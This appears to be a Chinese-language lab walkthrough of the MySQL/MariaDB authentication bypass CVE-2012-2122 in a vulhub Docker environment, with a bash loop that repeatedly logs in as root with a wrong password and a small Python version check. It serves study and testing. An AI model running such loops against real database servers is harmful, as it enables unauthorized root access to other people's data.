Mysql 身份認證繞過漏洞 CVE-2012-2122

前言:CVE-2012-2122 是一個影響 MySQL 和 MariaDB 的身份驗證漏洞,存在于特定版本中

vulhub/mysql/CVE-2012-2122/README.zh-cn.md at master · vulhub/vulhubhttps://github.com/vulhub/vulhub/blob/master/mysql/CVE-2012-2122/README.zh-cn.md

任務一 介紹?CVE-2012-2122

CVE 編號:CVE-2012-2122
披露時間:2012 年 6 月
漏洞類型:認證繞過(Authentication Bypass)
攻擊類型:遠程攻擊,無需認證(Remote / Unauthenticated)
CVSS 評分:10.0(最高危)
攻擊者可在不使用正確密碼的情況下,通過反復嘗試連接,以一定概率獲得數據庫的訪問權限,包括 root 用戶權限。
MySQL 在特定版本中,密碼認證邏輯依賴 memcmp() 函數來比對密碼哈希。但某些平臺或編譯器(如 GCC 編譯的 Linux x86_64)優化后返回值未嚴格為 0 或非 0,而是返回正負整數錯誤的核心是:
if (!memcmp(user_input_hash, stored_hash, 20))
{// 登錄成功
}原意是“如果兩個哈希相等(返回值為 0)則通過”,但編譯優化或符號擴展可能讓返回值表現不穩定,導致錯誤判斷于是只要攻擊者足夠頻繁地發送錯誤密碼,在特定概率(大約 1/256)下,memcmp 返回的非零值可能被誤判為 “密碼正確”,從而通過認證

任務二 啟動環境?

cd mysql/CVE-2012-2122/
docker compose up -d

sudo apt update
sudo apt install mysql-client-core-8.0
//安裝 MySQL 客戶端//如果是MariaDB(一般情況不是)
sudo apt install mariadb-client-core

?

任務三 攻擊?

for i in `seq 1 1000`; domysql -h 127.0.0.1 -P 3306 -uroot -pwrong_password 2>/dev/null
done//以下是可能出現的報錯
//這是因為 mysql 命令默認嘗試通過本地 socket 文件連接 MySQL,但:
復現環境中 MySQL 是跑在容器里,未通過本地 socket 暴露服務。

for i in `seq 1 1000`; domysql -h 127.0.0.1 -P 3306 -uroot -p123 2>/dev/null
done//改進代碼

?

任務四 修復 | 驗證?

import subprocessdef check_cve_2012_2122():try:output = subprocess.check_output("mysql --version", shell=True)version = output.decode().strip().split()[4].rstrip(',')affected_versions = ['5.1.62', '5.5.23', '5.6.5']  # 示例版本if version in affected_versions:return "Vulnerable"return "Patched"except Exception as e:return f"Error: {e}"

參考鏈接

  • MITRE CVE-2012-2122
  • MySQL Security Advisory

?

?

?

?

?

?

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/pingmian/83666.shtml
繁體地址,請注明出處:http://hk.pswp.cn/pingmian/83666.shtml
英文地址,請注明出處:http://en.pswp.cn/pingmian/83666.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

Win10停更,Win11不好用?現在Mac電腦比Win11電腦更便宜

最近不少朋友在換電腦前都犯了難。 以前大家最常說的一句是:“Mac太貴了,還是買Windows吧。”但現在不一樣了,國補教育優惠下來,新款M4芯片的Mac mini的入門價已經降到了3000元左右,曾經的價格壁壘,已經不…

C#中Struct與IntPtr轉換:實用擴展方法

C#中Struct與IntPtr轉換:實用擴展方法 在 C# 編程的世界里,我們常常會遇到需要與非托管代碼交互,或者進行一些底層內存操作的場景。這時,IntPtr類型就顯得尤為重要,它可以表示一個指針或句柄,用來指向非托…

手機歸屬地查詢接口如何用Java調用?

一、什么是手機歸屬地查詢接口? 是一種便捷、高效的工具,操作簡單,請求速度快。它不僅能夠提高用戶填寫地址的效率,還能幫助企業更好地了解客戶需求,制定個性化的營銷策略,降低風險。隨著移動互聯網的發展…

43、視圖解析-Thymeleaf初體驗

43、視圖解析-Thymeleaf初體驗 “43、視圖解析-Thymeleaf初體驗”通常是指在學習Spring Boot框架時,關于如何使用Thymeleaf模板引擎進行視圖解析的入門課程或章節。以下是對該主題的詳細介紹: #### Thymeleaf簡介 - **定義**:Thymeleaf是一個…

Day 40訓練

Day 40 訓練 PyTorch 圖像數據訓練與測試的規范寫法單通道圖像的規范訓練流程數據預處理與加載模型定義訓練與測試函數封裝模型訓練執行 彩色圖像的擴展應用數據預處理調整模型結構調整 關鍵要點總結 知識點回顧: 彩色和灰度圖片測試和訓練的規范寫法:封…

杰理可視化SDK--系統死機異常調試

杰理可視化SDK--系統死機異常調試 系統異常原因杰理SDK異常調試準備工作杰理SDK系統異常定位異常代碼示例1異常代碼示例2 在使用杰理可視化SDK進行軟件開發時,往往會遇到一些系統異常問題,系統異常是指芯片在運行代碼時,由于軟件或硬件狀態出…

圖簡記。。

模仿&#xff1a; algorithm-journey/src/class059/Code01_CreateGraph.java at main algorithmzuo/algorithm-journey Code01_CreateGraph C語言&#xff1a; #include <stdio.h> #include <stdlib.h> #include <string.h>#define MAXN 11 #define MAX…

Linux 常用命令與 Shell 簡介

文章目錄 **Linux 常用命令與 Shell 簡介****Shell 簡介****什么是 Shell&#xff1f;****Shell 的工作原理****常見 Shell 類型****命令行基礎****Tab 補全與通配符** **Linux 常用命令****1. 入門必備命令****1.1 尋求幫助 - man 命令****1.2 用戶間切換 - su 命令****1.3 特…

基于51單片機的超聲波智能避障小車仿真

目錄 具體實現功能 設計介紹 資料內容 全部內容 資料獲取 具體實現功能 &#xff08;1&#xff09;超聲波實時測量小車與障礙物間的距離&#xff0c;并用LCD1602顯示。 &#xff08;2&#xff09;當測得的距離超過50時&#xff0c;前進電機轉動&#xff08;模擬后輪&#…

AIGC工具平臺-GPT-SoVITS-v4-TTS音頻推理克隆

聲音克隆與語音合成的結合&#xff0c;是近年來生成式AI在多模態方向上的重要落地場景之一。隨著預訓練模型能力的增強&#xff0c;結合語音識別、音素映射與TTS合成的端到端系統成為初學者可以上手實踐的全流程方案。 圍繞 GPT-SoVITS-v4-TTS 模塊&#xff0c;介紹了其在整合…

Android7 Input(十)View 處理Input事件pipeline

概述: 本文主要描述View對InputEvent事件pipeline處理過程。 本文涉及的源碼路徑 frameworks/base/core/java/android/view/ViewRootImpl.java InputEvent事件處理 View處理input事件是調用doProcessInputEvents方法&#xff0c;如下所示: void doProcessInputEvents() {//…

Neo4j 完全指南:從入門到精通

第1章&#xff1a;Neo4j簡介與圖數據庫基礎 1.1 圖數據庫概述 傳統關系型數據庫與圖數據庫的對比圖數據庫的核心優勢圖數據庫的應用場景 1.2 Neo4j的發展歷史 Neo4j的起源與演進Neo4j的版本迭代Neo4j在圖數據庫領域的地位 1.3 圖數據庫的基本概念 節點(Node)與關系(Relat…

網心云 OEC/OECT 筆記(1) 拆機刷入Armbian固件

目錄 網心云 OEC/OECT 筆記(1) 拆機刷入Armbian固件網心云 OEC/OECT 筆記(2) 運行RKNN程序 外觀 內部 PCB正面 PCB背面 PCB背面 RK3566 1Gbps PHY 配置 OEC 和 OECT(OEC-turbo) 都是基于瑞芯微 RK3566/RK3568 的網絡盒子, 沒有HDMI輸入輸出. 硬件上 OEC 和 OECT…

攝像機ISP處理流程

1.Bayer&#xff1a;生成raw圖&#xff0c;添加色彩數據&#xff08;RGB&#xff09;&#xff0c;一般會將G的占比設置為R和B的和&#xff0c;實例&#xff1a; 2.黑電平矯正&#xff1a;減去暗電流造成的誤差&#xff1b; 3.鏡頭矯正&#xff1a;對四周的亮度進行矯正&#x…

【后端架構師的發展路線】

后端架構師的發展路線是從基礎開發到技術領導的系統性進階過程&#xff0c;需融合技術深度、架構思維和業務洞察力。以下是基于行業實踐的職業發展路徑和關鍵能力模型&#xff1a; 一、職業發展階梯? 初級工程師&#xff08;1-3年&#xff09;? 核心能力?&#xff1a;掌…

Unity VR/MR開發-VR開發與傳統3D開發的差異

視頻講解鏈接&#xff1a;【XR馬斯維】VR/MR開發與傳統3D開發的差異【UnityVR/MR開發教程--入門】_嗶哩嗶哩_bilibili

RabbitMQ如何保證消息可靠性

RabbitMQ是一個流行的開源消息代理&#xff0c;它提供了可靠的消息傳遞機制&#xff0c;廣泛應用于分布式系統和微服務架構中。在現代應用中&#xff0c;確保消息的可靠性至關重要&#xff0c;以防止消息丟失和重復處理。本文將詳細探討RabbitMQ如何通過多種機制保證消息的可靠…

批量圖片管理軟件介紹

軟件介紹 本文介紹一款功能全面的圖片處理軟件 - FastStone Image Viewer。 軟件功能概述 FastStone Image Viewer不僅支持圖片查看&#xff0c;還具備編輯、批量重命名和批量轉換等多種實用功能。 用戶授權說明 該軟件對個人用戶完全免費&#xff0c;企業用戶只需輸入用戶…

Playwright 測試框架 - Java

??【Playwright + Java 實戰教程】從零到一掌握自動化測試利器! ?? 本文專為 Java 開發者量身打造,通過詳盡示例帶你快速掌握 Playwright 自動化測試。涵蓋基礎操作、表單交互、測試框架集成、高階功能及常見實戰技巧,適用于企業 UI 測試與 CI/CD 場景。 ??? 一、環境…

nvidia系列教程-Usb otg模式修改為host模式

目錄 前言 一、了解 USB OTG 模式與 Host 模式 二、host模式切換 總結 前言 在 NVIDIA 設備的使用過程中,有時我們需要將 USB OTG(On-The-Go)模式切換為 Host 模式,以滿足連接外部設備(如 U 盤、鼠標、鍵盤等)的需求。本文將詳細介紹如何在 NVIDIA 設備上進行這一模式…